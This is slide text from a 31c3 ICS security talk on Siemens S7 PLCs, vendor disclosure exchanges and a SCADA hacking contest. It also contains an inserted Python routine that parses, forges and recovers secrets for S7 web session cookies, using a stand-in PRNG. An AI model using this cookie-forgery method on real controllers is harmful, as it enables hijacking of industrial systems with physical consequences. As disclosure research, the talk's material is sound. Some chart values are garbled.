SCADA StrangeLove: Too Smart Grid in da Cloud [31c3]


*All pictures are taken from Dr StrangeLove movie and other Internets

Sergey Gordeychik, Aleksandr Timorin

Group of security researchers focused on ICS/SCADA

to save Humanity from industrial disaster

and to keep Purity Of Essence

Alexander Timorin, Alexander Tlyapov, Alexander Zaitsev, Alexey Osipov, Andrey Medov, Artem Chaykin, Denis Baranov, Dmitry Efanov, Dmitry Nagibin, Dmitry Serebryannikov, Dmitry Sklyarov, Evgeny Ermakov, Gleb Gritsai, Ilya Karpov, Ivan Poliyanchuk, Kirill Nesterov, Roman Ilin, Sergey Bobrov, Sergey Drozdov, Sergey Gordeychik, Sergey Scherbel, Timur Yunusov, Valentin Shilnenkov, Vladimir Kochetkov, Vyacheslav Egoshin, Yuri Goltsev, Yuriy Dyachenko

https://icsmap.shodan.io/

― Google dorks

― Configuration scripts

― FS structure

― etc

--snip--

Comment to PT-SOL-2014001: The upload path has been changed. It is still possible to upload files, but they can't overwrite system critical parts any more.

Comment to PT-SOL-2014002: The system backup is created in a randomly chosen path and deleted afterwards. Therefore an unauthorized access is made much more difficult and very unlikely.

Second comment to PT-SOL-2014002: In order to compensate the weak encryption in the configuration file, the whole configuration file is now encrypted via the new HTTP transmission.

--snip--

To hack what? Grandmom’s reel 2 reel recorder?

Spot the Similarities

Popular HMI

Relatively new system

Platform independent

Custom webserver

http://cvedetails.com for Apache HTTP Server

http://www.digitalbond.com/blog/2013/03/21/s4x13-video-wincc-under-x-rays-by-sergey-gordeychik/

[Bar chart by year, 1997-2013, y-axis 0-1000; extracted bar values in order: 1 2 9 7 6 10 11 14 17 73 100 96 899 94135 285 81]

[Diagram: WinCC architecture. PLC1, PLC2, PLC3 on PROFINET/PROFIBUS; WinCC Servers on the LAN; WinCC SCADA-Clients, WinCC SCADA-Client + Web-Server, WinCC Web-Client, WinCC DataMonitor; Engineering station (TIA Portal/PCS7) running WinCCExplorer.exe/PdlRt.exe; reachable via Internet, corp LAN, VPNs; "some networks" in between]

+1337

PmzR9733Q8rG3LpwjCGZT9N/ocMAAQABAAKK1woAqsgAAAAAAAAAAIrXIUM=

uLiHXZUTy2GMgjr1KmgmcNN/ocMAAQACAAKK1woAqsgAAAAAAAAAAIrXIUM=

Mu/vgiIgtrxq0LVp26nkMtN/ocMAAQADAAKK1woAqsgAAAAAAAAAAIrXIUM=

tjH6vtNWCfa+QZHPDtCnKdN/ocMAAgADAAKK1woAqsgAAAAAAAAAAIrXIUM=

3e6cd1f7bdf743cac6dcba708c21994fd37fa1c30001000100028ad70a00aac800000000000000008ad72143

b8b8875d9513cb618c823af52a682670d37fa1c30001000200028ad70a00aac800000000000000008ad72143

32efef822220b6bc6ad0b569dba9e432d37fa1c30001000300028ad70a00aac800000000000000008ad72143

b631fabed35609f6be4191cf0ed0a729d37fa1c30002000300028ad70a00aac800000000000000008ad72143

3e6cd1f7bdf743cac6dcba708c21994f - MD5 of ? (16 bytes)

d37fa1c3 - CONST (4 bytes)

0001 - user logout counter (2 bytes)

0001 - counter of issued cookies for this user (2 bytes)

00028ad7 - value that doesn’t matter (4 bytes)

0a00aac8 - user IP address (10.0.170.200) (4 bytes)

00000000000000008ad72143 - value that doesn’t matter (12 bytes)

So, what about 3e6cd1f7bdf743cac6dcba708c21994f ???

3e6cd1f7bdf743cac6dcba708c21994fd37fa1c30001000100028ad70a00aac800000000000000008ad72143

3e6cd1f7bdf743cac6dcba708c21994f

MD5( NEXT 26 BYTES OF COOKIE + 16BYTES OF SECRET + 2 NULL BYTES)

What is SECRET ?

SECRET is generated by a PRNG after PLC start.

The PRNG is slightly more involved than the standard C PRNG.

SEED in [0x0000, 0xFFFF]

Still too many candidates to brute-force online against the PLC (PLC so tender >_<)

What about SEED? SEED very often depends on a time value.

SEED = PLC START TIME + 320

320 found empirically: the secret is generated from the current time about 3-4 seconds after PLC start.

How to obtain PLC START TIME ?

PLC START TIME = CURRENT TIME – UPTIME

Current time

Uptime
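The cookie anatomy and the seed-recovery reasoning above, as an added Python example (not code from the talk): it decodes cookie 1 from the slides into the fields the slide names, checks the MD5 relation the slide states, and runs the seed search offline against a forged cookie. The PLC's actual PRNG is not on the page, so `toy_prng` is a constructed stand-in and `recover_secret` takes the generator as a parameter; the time values in `demo()` are constructed, and the code notes the assumption that the two trailing cookie bytes fall outside the hashed 26.

```python
import base64
import hashlib
import hmac
import struct
from collections import namedtuple

# Cookie 1 from the slides, as base64 (Set-Cookie form) and as hex.
SLIDE_COOKIE_B64 = "PmzR9733Q8rG3LpwjCGZT9N/ocMAAQABAAKK1woAqsgAAAAAAAAAAIrXIUM="
SLIDE_COOKIE_HEX = ("3e6cd1f7bdf743cac6dcba708c21994fd37fa1c30001000100028ad7"
                    "0a00aac800000000000000008ad72143")

CONST = 0xD37FA1C3          # 4-byte constant present in every observed cookie
SEED_OFFSET = 320           # slide: SEED = PLC START TIME + 320

Fields = namedtuple("Fields", "digest const logouts issued junk1 ip junk2")


def parse_cookie(raw: bytes) -> Fields:
    """Split a 44-byte cookie into the fields the slide identifies."""
    if len(raw) != 44:
        raise ValueError("expected 44 bytes, got %d" % len(raw))
    const, logouts, issued, junk1 = struct.unpack(">IHHI", raw[16:28])
    ip = ".".join(str(b) for b in raw[28:32])   # user IP, big-endian
    return Fields(raw[:16], const, logouts, issued, junk1, ip, raw[32:44])


def expected_digest(raw: bytes, secret: bytes) -> bytes:
    """Slide: MD5(next 26 bytes of cookie + 16 bytes of SECRET + 2 NUL bytes).

    The cookie carries 28 bytes after the digest; taking the slide's count
    literally, this assumes the final two bytes are not hashed."""
    if len(secret) != 16:
        raise ValueError("secret must be 16 bytes")
    return hashlib.md5(raw[16:42] + secret + b"\x00\x00").digest()


def verify_cookie(raw: bytes, secret: bytes) -> bool:
    return hmac.compare_digest(raw[:16], expected_digest(raw, secret))


def build_cookie(logouts: int, issued: int, ip: str, secret: bytes,
                 junk1: int = 0x00028AD7,
                 junk2: bytes = bytes.fromhex("00000000000000008ad72143")) -> bytes:
    """Forge a cookie for the given counters/IP under a known SECRET.
    junk1/junk2 default to the values of cookie 1 (slide: 'doesn't matter')."""
    body = (struct.pack(">IHHI", CONST, logouts, issued, junk1)
            + bytes(int(o) for o in ip.split(".")) + junk2)
    digest = expected_digest(b"\x00" * 16 + body, secret)
    return digest + body


def seed_candidates(now: int, uptime: int, slack: int = 3) -> list:
    """PLC START TIME = CURRENT TIME - UPTIME; SEED = START TIME + 320.
    The 320 was found empirically (~3-4 s after start), so a few neighbouring
    values are tried too. Seeds are 16-bit (slide: 0x0000..0xFFFF)."""
    start = now - uptime
    return [(start + SEED_OFFSET + d) & 0xFFFF for d in range(-slack, slack + 1)]


def recover_secret(raw: bytes, seeds, prng):
    """Try each candidate seed offline; prng(seed) -> 16-byte SECRET is supplied
    by the caller, because the slides do not disclose the PLC's generator."""
    for seed in seeds:
        secret = prng(seed)
        if verify_cookie(raw, secret):
            return seed, secret
    return None


def toy_prng(seed: int) -> bytes:
    """Constructed stand-in for the PLC generator (NOT the real one): a 16-bit
    LCG whose high bytes are emitted. It exists only so the demo runs offline."""
    state, out = seed & 0xFFFF, bytearray()
    for _ in range(16):
        state = (state * 75 + 74) & 0xFFFF
        out.append(state >> 8)
    return bytes(out)


def demo():
    """Parse the slide cookie, then forge/recover under the toy generator.
    Times are constructed: the PLC 'started' at 5000 and has been up 700 units."""
    fields = parse_cookie(base64.b64decode(SLIDE_COOKIE_B64))
    now, uptime = 5700, 700
    real_seed = (now - uptime + SEED_OFFSET) & 0xFFFF        # what the PLC used
    forged = build_cookie(fields.logouts, fields.issued, fields.ip, toy_prng(real_seed))
    return fields, recover_secret(forged, seed_candidates(now, uptime), toy_prng)


if __name__ == "__main__":
    f, hit = demo()
    print("logouts=%d issued=%d ip=%s" % (f.logouts, f.issued, f.ip))
    print("recovered seed/secret:", hit[0], hit[1].hex())
```

Once the real generator is plugged in as `prng`, the work per cookie is a handful of MD5 computations over the time window instead of 65536 HTTP requests against the PLC, which is the point of deriving the seed from current time minus uptime.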

SSA-654382 , SSA-456423

Affected devices:

• Siemens S7-1200 PLC

• Siemens S7-1500 PLC

CVSS Base Score: 8.3

SCADASL: 13.01.2013

S7 PLC private/public community string for SNMP protocol can't be changed …

Siemens: 06.02.2013

… you cannot change the SNMP community string … This issue has no effect on security, as only non-sensitive information can be changed via SNMP. … community strings changeable in TIA Portal v12.5.

SCADASL: 05.08.2013

… vulnerabilities related to S7 1500 and S7 1200 PLC in attached file … including hardcoded SNMP.

Siemens: 22.10.2013

Hardcoded SNMP strings are in fact an issue …

We might eventually migrate to SNMPv3 …

[Chart: vulnerabilities by vendor (ABB, Advantech, Emerson, Honeywell, Siemens, Schneider Electric, Other), y-axis 0-250; series: Total, Total Fix, Vulns Fixed]

PHDays 2013 Choo Choo Choo Pwn

Security assessment/Pentest

PHDays IV Critical Infrastructure Attack

0-day research

http://bit.ly/1t8poTL http://www.phdays.com/press/news/38171/

Goals: ICS components 0-day research; make a disaster

0-day/1-day, CVSS, complexity, exploit, practical impact (e.g. disaster)

Mom, I can spoof MODBUS tag = 0 ;)

Targets

Schneider Electric: Wonderware System Platform, Indusoft Web Studio 7.1.4, ClearSCADA, IGSS, MiCOM C264

Siemens: Flexible, TIA Portal 13 Pro, WinCC, KTP 600, Simatic S7-1500 (1511-1 PN), S7-300 (314C-2 DP + CP343), S7-1200 v3, S7-1200 v2.2

Rockwell Automation: RSLogix 500, Allen-Bradley MicroLogix 1400 1766-L32BWAA

WellinTech KingSCADA, ICONICS Genesis64, ICP DAS PET-7067, Kepware KepServerEX (S7, DNP3), Honeywell Matrikon OPC (Modbus, DNP3) etc.

Winners

1. Alisa Esage – SE Indusoft Web Studio 7.1

Nikita Maximov & Pavel Markov - ICP DAS RTU

Dmitry Kazakov - Siemens Simatic S7-1200 PLC

2 days – 10+ 0days

Responsible disclosure: in progress

Fixes?

In 2013 we reported 9 vulnerabilities:

PT-EMR-DV-13002 World readable/writable *** (CVSSv2 6.8)

PT-EMR-DV-13003 World readable *** (CVSSv2 6.8)

PT-EMR-DV-13004 Weak cryptography used to store *** (CVSSv2 9.0)

PT-EMR-DV-13005 Multiple SQL injections in *** (CVSSv2 10.0)

PT-EMR-DV-13006 Weak cryptography used to *** (CVSSv2 6.8)

PT-EMR-DV-13007 Memory corruption in *** (CVSSv2 5.0)

PT-EMR-DV-13008 Format string vulnerability in *** (CVSSv2 10.0)

PT-EMR-DV-13009 Hardcoded access credentials *** (CVSSv2 10.0)

CVSS from 5.0 to 10.0

Advisory (ICSA-14-133-02) Emerson DeltaV v10-12 Vulnerabilities

CVE-2014-2349 Configuration File Manipulation Local Privilege Escalation (CVSSv2 6.2)

CVE-2014-2350 Service Processes Default Hardcoded Credentials (CVSSv2 2.4)

http://ics-cert.us-cert.gov/advisories/ICSA-14-133-02


150 freight cars, 12 500 tons, several locomotives

Safety Integrity Level

Probability of Failure on Demand (PFD)

Probability of Failure per Hour (PFH)


http://www.theguardian.com/world/2013/jul/25/spain-train-crash-travelling-so-fast

Modern Smart Grid:

- ICS/SCADA

- Mobile carrier

- Billing/Payment

- IoT

- Cloud

Alexander Zaitsev (@arbitrarycode)

Alexey Osipov (@GiftsUngiven)

Kirill Nesterov (@k_v_nesterov)

Dmitry Sklyarov (@_Dmit)

Timur Yunusov (@a66at)

Gleb Gritsai (@repdet)

Dmitry Kurbatov

Sergey Puzankov

Pavel Novikov
